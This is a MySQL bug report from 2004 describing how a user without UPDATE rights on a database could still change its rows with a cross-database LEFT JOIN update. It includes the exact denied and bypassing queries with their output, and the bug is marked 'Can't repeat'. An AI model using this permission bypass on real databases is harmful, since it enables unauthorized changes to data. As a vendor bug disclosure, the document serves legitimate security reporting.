MySQL Bugs: #6872: cross-database update evades permissions

Bug #6872	cross-database update evades permissions
Submitted:	29 Nov 2004 10:55	Modified:	29 Nov 2004 15:18
Reporter:	Tom Cunningham	Email Updates:
Status:	Can't repeat	Impact on me:	None
Category:	MySQL Server	Severity:	S1 (Critical)
Version:	4.0.18-max	OS:	Linux (SuSe 8 (I think))
Assigned to:		CPU Architecture:	Any

View
Add Comment
Files
Developer
Edit Submission
View Progress Log
Contributions

Description:
Can get around the non-update permissions by doing a cross-database join.

How to repeat:
(1) this query fails, and *should* fail.

mysql> update ss1.customers set title='Mr' where id=107581;
ERROR 1044: Access denied for user: 'sdkain@%' to database 'ss1'

(2) these queries work, and *shouldn't* work.

mysql> create table tom_test (tom int);
Query OK, 0 rows affected (0.02 sec)

mysql> update ss1.customers left join tom_test on tom=1 set title='Mr' where id=107581;
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0